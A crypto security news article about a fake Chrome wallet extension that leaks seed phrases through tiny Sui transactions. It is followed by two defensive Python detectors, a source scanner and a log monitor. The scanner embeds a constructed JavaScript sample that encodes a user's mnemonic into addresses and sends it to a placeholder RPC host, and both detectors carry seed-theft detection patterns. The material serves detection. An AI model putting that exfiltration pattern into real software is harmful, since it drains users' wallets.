🚨 Alert: Malicious Ethereum Wallet Extension Hijacks Seed Phrases via Blockchain Transactions


Published: 2025-11-14 07:36:38

Fake Ethereum Wallet Extension Steals Seed Phrases Through Blockchain Transactions

Crypto users beware—a wolf in sheep's clothing just entered the DeFi pasture. A fake Ethereum wallet extension has been siphoning seed phrases by exploiting blockchain transactions, turning self-custody into self-sabotage.

How It Works: The malware masquerades as a legitimate wallet tool, then intercepts recovery phrases during routine transactions. No fancy hack—just old-school deception with a Web3 twist.

Why It Matters: While Wall Street spends millions on 'blockchain security consultants,' this $0-cost phishing attack proves crypto's weakest link remains the same: humans trusting shiny interfaces.

Bottom Line: Always verify extensions like you'd verify a 'financial advisor' with yacht photos but no LinkedIn. Your keys, your coins—your responsibility.

TLDR

  • A malicious Chrome extension called “Safery: Ethereum Wallet” ranks fourth in Chrome Web Store searches for Ethereum wallets
  • The extension steals seed phrases by encoding them into fake Sui blockchain addresses and sending tiny transactions worth 0.000001 SUI
  • Threat actors decode the recipient addresses from these microtransactions to reconstruct users’ seed phrases and drain their wallets
  • The extension was uploaded to Chrome Web Store on September 29, 2025 and remained available as of November 13, 2025
  • Warning signs include zero user reviews, grammatical errors in branding, no official website, and a Gmail-linked developer account

A fake cryptocurrency wallet extension on Google’s Chrome Web Store is stealing user seed phrases through an unusual method involving blockchain microtransactions. The extension has appeared high in search results despite containing malicious code.

🚨 SECURITY ALERT: Malicious Chrome Extension Stealing crypto Assets

A fake ethereum wallet extension "Safery: Ethereum Wallet" is exfiltrating seed phrases by encoding them into #Sui transactions—a highly sophisticated attack method.

⚠️ Extension Name: Safery: Ethereum Wallet… pic.twitter.com/FIEkkq2pau

— GoPlus Security 🚦 (@GoPlusSecurity) November 14, 2025

The extension is named “Safery: Ethereum Wallet.” It markets itself as a secure tool for managing Ethereum-based assets. Blockchain security platform Socket identified the threat in a report published on Tuesday.

The malicious software currently ranks as the fourth search result when users type “Ethereum Wallet” into the Chrome Web Store. It appears just below legitimate wallet extensions like MetaMask, Wombat, and Enkrypt. The extension was first uploaded on September 29, 2025.

The extension works by allowing users to either create new wallets or import existing ones. Both options compromise user security. When a user creates a new wallet, the extension immediately captures the seed phrase.

How the Theft Mechanism Works

The malware uses an unusual method to steal credentials without a traditional command-and-control server: the blockchain itself carries the stolen data. It encodes the user's BIP-39 mnemonic seed phrase into synthetic Sui-style blockchain addresses, then sends a microtransaction of 0.000001 SUI to these fake addresses from a wallet controlled by the attackers.

Security researcher Kirill Boychenko from Socket explained the process: the seed phrase leaves the user's browser hidden inside normal-looking blockchain transactions, and the threat actors monitor the Sui blockchain for these tiny transfers.

They can then decode the recipient addresses to reconstruct the original seed phrase. Once they have the seed phrase, they gain complete access to drain all assets from the compromised wallet. The method works whether users create new wallets or import existing ones.

Users who import existing wallets face immediate risk. The moment they enter their seed phrase into the extension, it gets transmitted through the blockchain transaction system. The attackers can access these funds at any time after capturing the credentials.

Warning Signs and Detection

Several red flags point to the extension's lack of legitimacy. It has zero user reviews on the Chrome Web Store, and its branding contains grammatical mistakes and looks low-effort.

There is no official website linked to the extension. The developer contact information uses a Gmail account rather than a professional domain. These warning signs should alert users before installing the extension.

Koi Security confirmed the threat in an independent analysis. They verified that the extension monitors the blockchain to decode addresses back to seed phrases. Security experts recommend users only install trusted wallet extensions with verified legitimacy.

Defenders should scan extensions for specific malicious indicators. These include mnemonic encoders, synthetic address generators, and hard-coded seed phrases. Extensions that write to the blockchain during wallet import or creation should be blocked.
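The indicators listed above (hard-coded seed phrases, embedded mnemonic handling, synthetic address generators, and chain writes reachable from the import or create path) can be turned into a simple static scan over an extension's source. The following is an added example written for this article, not code from Socket, Koi Security, or the extension itself; the two JavaScript samples it scans are constructed, the RPC endpoint is a placeholder, and the JSON-RPC method names used as "chain write" markers are an assumption about which calls submit a signed transaction.

```python
"""Static indicator scan for wallet-extension source files.

Added example: heuristics for the indicators the article lists (mnemonic
encoders, synthetic address generators, hard-coded seed phrases, and chain
writes reachable from wallet import/create). The sample sources below are
constructed for this example, not taken from the real extension.
"""
import re
from typing import List, Tuple

# A handful of real BIP-39 English words, enough to recognise the constructed
# sample below. A production scanner would load the full 2048-word list.
BIP39_SAMPLE = {
    "abandon", "ability", "able", "about", "above", "absent", "absorb",
    "abstract", "absurd", "abuse", "access", "accident", "account", "zoo",
}

# Assumption: JSON-RPC methods that submit a signed transaction, i.e. a
# write to the chain. A wallet should never need these during import.
CHAIN_WRITE_METHODS = ("sui_executeTransactionBlock", "eth_sendRawTransaction")

QUOTED_STRING = re.compile(r"""["']([^"']{20,})["']""")
# "0x" + <computed> or `0x${...}`: an address assembled from pieces at
# runtime rather than derived from a key, the shape of a synthetic address.
ADDRESS_BUILDER = re.compile(r"""["']0x["']\s*\+|`0x\$\{""")
MNEMONIC_TOKENS = re.compile(r"mnemonic|seed\s*phrase|seedPhrase|recovery", re.I)


def looks_like_mnemonic(text: str) -> bool:
    """True for a 12- or 24-word literal made mostly of BIP-39 words."""
    words = text.split()
    if len(words) not in (12, 24):
        return False
    hits = sum(w in BIP39_SAMPLE for w in words)
    return hits >= 0.75 * len(words)


def scan_source(name: str, source: str) -> List[Tuple[str, str]]:
    """Return (indicator, detail) pairs found in one source file."""
    findings = []
    for literal in QUOTED_STRING.findall(source):
        if looks_like_mnemonic(literal):
            findings.append(("HARDCODED_SEED", f"{name}: literal '{literal[:24]}...'"))
            break
    # Embedding the wordlist is not malicious by itself (legitimate wallets
    # validate mnemonics offline), so it only raises the review score.
    if '"abandon"' in source and '"ability"' in source:
        findings.append(("EMBEDDED_WORDLIST", f"{name}: BIP-39 wordlist prefix present"))
    if ADDRESS_BUILDER.search(source):
        findings.append(("SYNTHETIC_ADDRESS", f"{name}: 0x address assembled at runtime"))
    writes = [m for m in CHAIN_WRITE_METHODS if m in source]
    if writes and MNEMONIC_TOKENS.search(source):
        findings.append(("WRITE_ON_IMPORT",
                         f"{name}: chain write {writes} in mnemonic-handling code"))
    return findings


def verdict(findings: List[Tuple[str, str]]) -> str:
    """Block on the strong indicators, send the weak ones to review."""
    codes = {code for code, _ in findings}
    if codes & {"HARDCODED_SEED", "WRITE_ON_IMPORT"}:
        return "block"
    return "review" if codes else "allow"


# Constructed sample: a file that handles the user's mnemonic, carries a
# hard-coded phrase, assembles 0x addresses and submits a transaction.
MALICIOUS_SAMPLE = r'''
const FUNDING_SEED = "abandon ability able about above absent absorb abstract absurd abuse access zoo";
const RPC = "https://rpc.example.test";  // placeholder endpoint
function importWallet(mnemonic) {
  for (const chunk of encodeMnemonic(mnemonic)) {
    const to = "0x" + chunk.padEnd(64, "0");
    rpcCall(RPC, "sui_executeTransactionBlock", buildTransfer(to, 1));
  }
}
'''

# Constructed sample: a benign-looking file that embeds the wordlist only to
# validate a phrase offline and never writes to a chain.
BENIGN_SAMPLE = r'''
const WORDLIST = ["abandon", "ability", "able", "about", "above", "absent"];
function validateMnemonic(mnemonic) {
  return mnemonic.split(" ").every((w) => WORDLIST.includes(w));
}
'''

if __name__ == "__main__":
    for name, src in (("wallet.js", MALICIOUS_SAMPLE), ("bip39.js", BENIGN_SAMPLE)):
        found = scan_source(name, src)
        print(name, verdict(found), found)
```

The scoring deliberately separates weak indicators from strong ones: a bundled BIP-39 wordlist is normal for any wallet that validates phrases offline, so it only routes the extension to review, while a hard-coded seed phrase or a transaction submission sitting in the same code path as mnemonic handling is enough to block on its own.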

Boychenko noted that this technique allows threat actors to switch chains and RPC endpoints easily. Traditional detection methods that rely on domains, URLs, or specific extension IDs will miss this type of attack. Unexpected blockchain RPC calls from browsers should be treated as high-priority security signals.

Users should monitor all wallet transactions consistently. Even transactions involving very small amounts could indicate malicious activity. The extension remained available for download on the Chrome Web Store as of November 13, 2025, with its most recent update occurring on November 12.
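Because the attackers can swap chains and RPC endpoints, Boychenko's advice is to treat unexpected blockchain RPC calls from a browser as the signal rather than any particular domain or extension ID. The following is an added example illustrating that approach against constructed proxy log lines; it is not from the article, Socket, or Koi Security. The log format, the host names and IPs are constructed, and the JSON-RPC method prefixes and the list of transaction-submitting methods are assumptions.

```python
"""Flag blockchain JSON-RPC requests made by a browser process.

Added example. Constructed proxy log format, one request per line:
  ts=<iso8601> src=<ip> proc=<process> host=<host> body=<request body>
Detection keys on the JSON-RPC shape of the body rather than on the host,
because the article notes attackers can swap chains and RPC endpoints.
"""
import json
import re
from typing import Dict, List, Optional

BROWSER_PROCS = {"chrome.exe", "chrome", "msedge.exe", "firefox.exe", "brave.exe"}

# Assumption: method-name prefixes used by EVM-style and Sui JSON-RPC nodes.
CHAIN_METHOD_PREFIXES = ("eth_", "sui_", "suix_")
# Assumption: methods that submit a transaction, i.e. write to the chain.
# A browser that suddenly writes to a chain during wallet setup is the
# signal the article calls high priority.
WRITE_METHODS = {"eth_sendRawTransaction", "eth_sendTransaction",
                 "sui_executeTransactionBlock"}

LINE = re.compile(r"ts=(\S+) src=(\S+) proc=(\S+) host=(\S+) body=(.*)$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one constructed log line into its fields, or None if malformed."""
    m = LINE.match(line.strip())
    if not m:
        return None
    ts, src, proc, host, body = m.groups()
    return {"ts": ts, "src": src, "proc": proc, "host": host, "body": body}


def rpc_method(body: str) -> Optional[str]:
    """Return the chain RPC method name if the body is a JSON-RPC 2.0 call."""
    try:
        obj = json.loads(body)
    except ValueError:
        return None
    if not isinstance(obj, dict) or obj.get("jsonrpc") != "2.0":
        return None
    method = obj.get("method")
    if isinstance(method, str) and method.startswith(CHAIN_METHOD_PREFIXES):
        return method
    return None


def classify(rec: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Alert on chain RPC from a browser; writes are high, reads medium."""
    method = rpc_method(rec["body"])
    if method is None or rec["proc"] not in BROWSER_PROCS:
        return None
    return {
        "ts": rec["ts"], "src": rec["src"], "host": rec["host"],
        "method": method,
        "severity": "high" if method in WRITE_METHODS else "medium",
    }


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Run the classifier over every parseable line and collect alerts."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            alert = classify(rec)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample lines; hosts and IPs are placeholders.
SAMPLE_LOG = [
    'ts=2025-11-13T09:12:01Z src=10.0.0.5 proc=chrome.exe host=node-a.example.test '
    'body={"jsonrpc":"2.0","id":1,"method":"sui_executeTransactionBlock","params":["<tx_bytes>",["<sig>"]]}',
    'ts=2025-11-13T09:12:03Z src=10.0.0.5 proc=chrome.exe host=node-b.example.test '
    'body={"jsonrpc":"2.0","id":2,"method":"eth_blockNumber","params":[]}',
    'ts=2025-11-13T09:12:05Z src=10.0.0.7 proc=node host=node-a.example.test '
    'body={"jsonrpc":"2.0","id":3,"method":"sui_getObject","params":["0xabc"]}',
    'ts=2025-11-13T09:12:07Z src=10.0.0.5 proc=chrome.exe host=api.example.test '
    'body={"query":"ping"}',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"], alert["src"], alert["method"], alert["host"])
```

On the sample log this raises two alerts: a high-severity one for the browser submitting a transaction and a medium one for a browser read call, while the same RPC traffic from a non-browser process and an unrelated API call produce nothing. Keying on the JSON-RPC body means the rule keeps working when the attacker moves to a different node or chain, which is exactly the gap a domain or extension-ID blocklist leaves open.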
